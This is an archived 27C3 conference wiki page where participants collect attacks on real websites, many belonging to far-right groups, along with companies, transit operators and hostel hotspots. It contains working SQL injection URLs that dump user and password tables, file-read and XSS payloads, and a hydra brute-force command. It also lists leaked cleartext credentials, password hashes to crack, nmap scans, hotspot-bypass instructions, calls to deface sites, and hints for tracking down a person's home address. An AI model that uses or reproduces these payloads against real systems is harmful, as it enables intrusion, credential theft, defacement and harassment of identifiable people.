From 27C3 public wiki

Jump to: navigation, search


Login for this page as:

  • Username: hacked Password: dekcah


NSA eZine - BEHIND ENEMY LINES Vol1. PRV09 Analyses

This information all provided 4 fr33, please send it to your friends and enjoy the audits. Download Package:
3. *In Progress
4. *In Progress

H(a/e)ckler & Koch USA - we are glad that they joined in. Greetz kabelbrand. Also: - these people are so generous... Screenshots der Unterseiten: firearms11419 ftp stats u.a.: QXxSpm3Vcc HK Custsvc heckler have fun


Schaut euch auch mal diese Seite an: <- Top Target! --> Icecast: Wenn das keine pure Provokation und Herausforderung ist.

Hier das selbe: |<- ist der selbe server ...gibt afaik 4 oder 5 domins die auf den server zeigen some docs on the registrant: Use whois for personal data. facebook: home adress maybe not actual anymore, try calling him and ask nazipack freunde nennen sich weisse woelfe Auf einem anderen liegt jedoch:

  • 1. Account auf dem Server:
    • wa6136:lena2003
      • doesn't work
    • privilege escalation possible?

Antwort vom Hoster

1. Antwort 2. Antwort


Long search & win! <3 I got one. (;

By: bursali
First, go to the shop & put something to the basket.
Then, change the link to:
Start e.g. "HackBar", activate the "Enable Post data"-Feature and c&p this to the "Post Data" field:
"in_form=1&vorname=&nachname=&strasse=&ort=&epost="><IFRAME style="position:fixed;top:0;left:0;z-index:9999999;" SRC="" width="100%" height="1250"></IFRAME>&anmerkungen=&land=tr&agb=1"


By: bursali

Junge Nationalfaschisten[SQL?] ( Da sollte doch was gehen....

offizielle veranstalter des größten naziaufmarsches in sachsen am 13. - 14. februar in dresden

-->joomla cms... --> aber sehr alte Version kennt wer gute Exploits dafür?


strange: sql error, bevor das cookie abgelegt wird. mal anschaun.[q]=%27+OR+1+%3D+2&id=129 Can somebody analyse this? Seems like a working SQL-Injection. ->damn old cms

-> Have fun with database data =) ($typo3_db etc.) -> (PW is joh316) (You can create admin user at point2 "Database Analyzer")

FPÖ Site:,2,3,4,5,0x2f6574632f706173737764,7,8,9--

Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_apreq2-2005123
  • Main website running NPD CMS (anybody got the sourcecode of that CMS?)
  • RPC on Port 111
  • mySQL 5.0.51a-24+lenny3 on Port 3306
  • Some strange HTTP server on port 53729
  • Nmap output:
Starting Nmap 5.21 ( ) at 2010-12-30 13:34 CET
NSE: Loaded 36 scripts for scanning.
Initiating Ping Scan at 13:34
Scanning ( [2 ports]
Completed Ping Scan at 13:34, 1.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:34
Completed Parallel DNS resolution of 1 host. at 13:34, 0.01s elapsed
Initiating Connect Scan at 13:34
Scanning ( [1000 ports]
Discovered open port 25/tcp on
Discovered open port 22/tcp on
Discovered open port 443/tcp on
Discovered open port 80/tcp on
Discovered open port 993/tcp on
Discovered open port 111/tcp on
Discovered open port 110/tcp on
Discovered open port 3306/tcp on
Discovered open port 995/tcp on
Discovered open port 143/tcp on
Discovered open port 21/tcp on
Increasing send delay for from 0 to 5 due to max_successful_tryno increase to 4
Increasing send delay for from 5 to 10 due to max_successful_tryno increase to 5
Discovered open port 873/tcp on
Completed Connect Scan at 13:34, 14.39s elapsed (1000 total ports)
Initiating Service scan at 13:34
Scanning 12 services on (
Completed Service scan at 13:35, 24.47s elapsed (12 services on 1 host)
Initiating RPCGrind Scan against (94.1 at 13:35
Completed RPCGrind Scan against (94.1 at 13:35, 0.06s elapsed (1 port)
NSE: Script scanning
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 13:35
Completed NSE at 13:35, 5.29s elapsed
NSE: Script Scanning completed.
Nmap scan report for (
Host is up (0.056s latency).
rDNS record for
Not shown: 988 closed ports
21/tcp   open  ftp      vsftpd 2.0.7
22/tcp   open  ssh      OpenSSH 5.1p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 1024 8d:ba:19:c4:29:f5:37:78:60:19:dc:b7:74:9e:60:19 (DSA)
|_2048 57:7f:31:04:35:df:77:a8:8c:4e:c9:43:1d:fb:17:ea (RSA)
25/tcp   open  smtp     Postfix smtpd
80/tcp   open  http     Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_apreq2-20051231/2.6.0 mod...)
|_html-title: Neies - Hemecht an Natur Luxembourg
|_http-favicon: Unknown favicon MD5: A11C30EB6DAE1BB3D2E52D4B9F203A54
110/tcp  open  pop3     Dovecot pop3d
111/tcp  open  rpcbind  2 (rpc #100000)
| rpcinfo:  
| 100000  2    111/udp  rpcbind  
| 100024  1  54036/udp  status   
| 100000  2    111/tcp  rpcbind  
|_100024  1  53729/tcp  status   
143/tcp  open  imap     Dovecot imapd
443/tcp  open  ssl/http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_apreq2-20051231/2.6.0 mod...)
|_html-title: Parallels Confixx
873/tcp  open  rsync    (protocol version 30)
993/tcp  open  ssl/imap Dovecot imapd
|_sslv2: server still supports SSLv2
995/tcp  open  ssl/pop3 Dovecot pop3d
|_sslv2: server still supports SSLv2
3306/tcp open  mysql    MySQL 5.0.51a-24+lenny3
| mysql-info: Protocol: 10
| Version: 5.0.51a-24+lenny3
| Thread ID: 835603
| Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection
| Status: Autocommit
|_Salt: y2+~]65GC]*VRz/v,pts
Service Info: Host:; OSs: Unix, Linux

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 45.86 seconds


Table dump:

Password/Username cleartext dump:','a')=0)+union+all+select+id_user,user_name,user_fullname,user_pwd,5,6+from+dbo.GKPUser+--

Nice many "password", clear passwords or "*" as login for "Admin"... These usernames also work for :) (not Admin)

recursive wget-dump of


Archivierte Dienstpläne, und allerlei der Kölner Verkehrs-Betriebe:

Der Mofi Generator wird glaub ich auch direkt für die Haltestellen genutzt. Also legt los ;-) Hier eine Textvorlage: +++ Unfassbar: Sie glauben wirklich, dass die Zeitangaben auf diesen Info-Tafeln stimmen? Hahahaha, sind Sie naiv. Ihre KVB... We Come in Peace +++

Dumped files (wget -m): magnet:?xt=urn:btih:f3d889b8d76929296fa596e3553602447fbb018b& or


Ich hab nen mini server (lighttpd 1.4.28, mysql 5.1, php 5.3.4) von mir umgestrickt und eine Installation von Piwik drauf gehaun: User: ccc Pass: ccc123

Wer lust hat mit zu suchen ob/wie man das defacen (ob mit oder ohne login) kann ist herzlich willkommen. Source von Piwik findet man unter - installiert ist der aktuelle trunk (bzw. 1.1b4).

> PwnD!

MATCHED by: Rem0ve
Comment: Gr33tz 2 x4


exploit in demos

Multple vulns in multiple demos versions from here:, used for some kind of regional democracy improvement. "Vendor" is informed ...


210/1027 hashs cracked with usernames and emails PMs als html,33775890/index.html/ PMs als TXT: Please read: stupid! :D Funny PM from the Naziboard:


-- Dunkin Dos -- Epic Fail ! Slogan collection for a more cost effective Dos:

  • "Ist dies das Arbeitsamt?"
  • "Oh, ich habe mein Geld vergessen..."
  • "Ist der Zuckerguss Glucosefrei?"
  • "Haben sie auch Berliner?"
  • "Gibts das auch mit Rind?"
  • "Ist der Donut auch wirklich tot?"
  • "Wurde der Donut nachhaltig produziert?"
  • "Enthält der Donut Spuren von Geflügel oder Nüssen?"
  • "Einmal mit Scharf, ohne Zwiebeln und Paprika bitte!"
  • " Pommes rot/weiss bitte!"
  • "Do speak English? My English ill, so you speak slow, please. I want a... how do you call those thingies over there?"
  • "I want my money back! There is something missing, in the middle!"
  • "I have some keys... Can I sell my keys here? If you want keys, i got some keys for Tempelhof and I can sell you some keys ... " (lightning talks day 2: last speaker)

--Burger King --

-- Operation Payback --

  • Hi, I have a technical complaint about this burger, it's gone, like if somebody ate it. May I have my money back?

spread the word

  • DaPhix Prepay-Internet-Hotspot @ -> last years instructions don't work anymore. Ey, they improve! BUT: the SOAP service to create a new account can still be used. You can reach it directly from their free WLAN. :) Here is some ruby code to generate an account for free internet access: (shorter PHP code is available at ). Other more or less interesting services can be found at Perhaps you want to get a full list of possible passwords using PropertyService:getProperty('password')? Feel free to play ;-)

Update: Meininger City Hostels (Hauptbahnhof): Last years hack was fixed, but the Soaphack above still works. Also, username "1" and password "berlin" gets you free internet -- without having to deal with Ruby!

  • ruby noobs should try complete path to savon.rb if it is not starting
require 'rubygems'
#require 'Savon'
require '/var/lib/gems/1.8/gems/savon-0.8.1/lib/savon.rb'

Note: This hack is for debian only, which neuters rubygems.

  • require 'savon' with a small s works well on ruby 1.9.2

DaPhix hotspots are used by many Hostels, including Generator, Meininger and Baxpax. In case the SOAP trick shouldn work anymore, you can always use a DNS tunnel, for example iodine.

Some hostels got a fix during night of day 1 to day 2. Seems that they learned to not expose SOAP sell webservices via the hotspot.

Anyone got a working solution for the DaPhix Hotspot at Meininger Hostel Prenzlauer Berg?


Please, make this section clean and nice, no lame XSS on random sites. XSS can be cool if it's stored XSS, allows you to write a webworm (SAMY! COME BACK!) or such. Thanks!



because they ***** are still in heaven. /hate



 * it-expert. not.
 * ( naziscum ... )
 * > part 2 :D
 * just something to read <- local net-shop based in mecklenburg
 * - user: greg pass: no1hacker  
 * nmap
 * <-- shared wordpress hosting for nazis nmap
 * (wordpress 3.0.2,
 * (Joomla, geschützt durch [CT Security System|]
 * das NPD CMS, genutzt auf,,, und vielen mehr
 * (vBulletin 3.8.4)
 * [1]
 * ;)
 * (zerbasteltes wordpress)
 * Complete nmap scan with a whole bunch of open ports  (Incl. cpanel)
 * /|\ Why THIS page? The server is open like a barn. And of course because we can.
 * <-- use npd cms
 * <- need a Java script expert on this, its asking for defacing...
 * nmap
 * <- TOP Target ! ;)
 * <- TOP Target ! ;)
 * - (ip has changed) freebsd box which i set for fun, try hacking it.
 * or .com
 * (typo3 and runs old vsFTPd 2.0.7)
 * (yes, there are also Nazi fucktards in .LU -_-) <-- use npd cms
 * QM is the who?
 ** Could you create a "manual" feed for the folder of documents? :-)
 * a list of nazisites
* or/and (or any other Deutsche Bahn-Site)
*  <--- Nazi-shemale
* <---Bertelsmann Bildungs U-Boot
* <--- Katholisten. Faschistisch, homophob, antisemitisch, Holocaustleugner usw.
** "Wie wird jemand homosexuell? (..) Homosexuell wird ein Mensch in der Pubertät, wenn er von älteren Homosexuellen verführt oder sexuell mißbraucht wird." von 
** "Atheismus ist ein anderes Wort für Sexverfallenheit und Haß"
** Siehe auch: " vertritt dagegen die längst überholte These, dass Schwule und Lesben "geheilt" werden können: Die "Theorie", dass Homosexualität nicht einfach mit Beten verändert werden kann, werde "immer wieder in der Praxis von etlichen Bekehrungen widerlegt."
 *it's typo 3, database is set up, if u are a typo3 guy, u can deface it, go for it, i have never worked with typo3
 *mysql user: b2dent334
 *mysql pass: wecomeinpeace
 *mysql host:
 *mysql port: 3306

would be nice if some "expert" take a look at this weak pages, thanks!

   * (redaktioneller zugriff) 
   * (alte webseite)
       * bruteforce usernames (wordlist) on 9live-server: hydra -l home -p words http-post-form "/portal/gs/feed.jsp:login&stationname=../../../../../../home/^USER^/../../../../../../../../../usr/share/tomcat5/webapps/portal/gs/9live&type=RLA:gs_sender.css" 
   * username to mail
   * full path disclosure (/export/www/CONTENT/9live-80/docs/php-bin/lib/Adodb/ 
   :* < h1>Connecting mysqli...< /h1>ERROR: MySQL test requires a MySQL server on localhost, userid='admin', password=, database='test'
     Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2)< h3>Tests Completed< /h3>curl

Insecure Passwords

 * (user: ' or 1=1-- ; pass=' or 1=1--)
 * see ZDF section

File Inclusions,2,3,4,5,6,7,load_file(0x2f6574632f706173737764),9,10,11,21,31,41,5,16,17,18,19,20,21,22,23,24

SQL Injections,2,3,4,5,6,7,8,9,concat(user,0xa,password,0xa,host),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20mysql.user--&jahr=2010,2,@@datadir,4,5,6,7,8,9,10,11%20FROM%20auth_users--

Doesn't work?? create an account. Sure? regarding to,1%23,2,3,4,5,6,user,%20password,9,host,11,21,31,41,5,16,17,18,19,20,21,22,23,24%20from%20mysql.user,npa,pseudo,password,5,6,email,8,9,10,11,12,13%20from%20users,2,3,4,5,6,7,8,9,10,host,%20user,%20password,14,15,16,17,18,19%20from%20mysql.user,@@version-- (fixed),2,3,password,5,username,7,8,9,10,11,12%20from%20svp_users,pass,name,id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+bbdw_ttb_user--&p=3&a=10&aid=92,2,column_name,4,5,6,table_name,8%20from%20information_schema.columns--,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,concat_ws%28%27;%27,ID,ADMIN,VORNAME,NAME,EMAIL,BENUTZER,PASSWORD%29,91,92,93,94,95,96%20from%20Benutzer--+&ART=1 (the MD5 hash for translates to 28252219)

Didn't work for me. But,2,3,4,5,6,7,8,9,10,11,12,13,BENUTZER,15,16,17,18,19,20,21,22,23,24,25,PASSWORD,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96%20from%20Benutzer did.

Clans should upgrade their Clansphere, like suggests ...:,2,users_nick,users_pwd,5%20from%20cs_users%20--%20#

Happy little cloud

hashes to crack

46EA83AE992E10A43DD56FF4E3C2C84918980F57 (mysql)

AAD3B435B51404EEAAD3B435B51404EE:0744366FB9B73089AE392B8937182C1D (ntlm)

$1$7IzC.lOd$GtGD1Dkp7CZzkbSOuCr1F0 (root passwort from /etc/shadow)

6d2bb5d42c8321be2783fa847f161831 (md5)

Plaintext: "JASh2J." HEX: 4a 41 53 68 32 4a 2e

b614cb5d3fa744fb788e285ac3de612e (md5)

c8f85603eaeefd09b5cc1d1933427a22 (md5)

61904682c0fd1cabb2b1ff42e564c500 (md5, Asgard Forum: Username:admin)

Da lief doch ein vBulletin oder nicht? vBulletin = md5(md5($pass).$salt)) und in dem Tabelle gibts ne spalte Salt ;)

BC31095A7DA2A3206BDB3F1319CA5220 (Win LM)

Was this extracted OK? Can you provide the complete CAIN or pwdump/fgdump-output? The NTLM-Hash is needed to provide the exact password, LM will only yield Uppercase and strange mappings for certain special characters.

wpa-handshakes to crack

misc (Nazi-Shop) - Order something and edit the article price in the post request (

Typisch Nazis...große Schnauze nichts dahinter :D ( zu nginx 0.6.32 (aus nmap) ... <0.6.38

hacked but working QR-Code for 27c3 : (can be verified with online qr decoder at

old TYPO3

  • you'll find many old cms ""typo3_src-4.1.1/typo3/sysext/" Change only the versionnumber..


  • search a Page with an existing ID (here 4)
  • open the link and copy the hash value (here: Calculated juHash, 3b85b28449)
  • rebuild the link and download the localconf.php
Oh yes , see here this provider is so stupid min 20 Websites:

Fnord-Jahresrückblick 2010

  • 9 alarm clocks placed under chairs in the audience and 1 under the speakers table. they went off at 10:20 pm.

Open to the web

Thema: Kundendaten Online ... (offensichtlich) ahnungslose Schweizer .... Die redCOR AG hat viel Erfahrung ... und doch alle Kundendaten im Netz:

->  <-

Passwörter, Zugangsdaten, persönliche Nachrichten, Database Dumps (f. z.B. funktionieren u.v.m. ABER!: we come in peace -> Remember!


  • DWDL: Eulmeldung: gehackt: Eine Eule und der berühmte Sack Reis. Wir haben einen Screenshot:
Archived page - Impressum/Datenschutz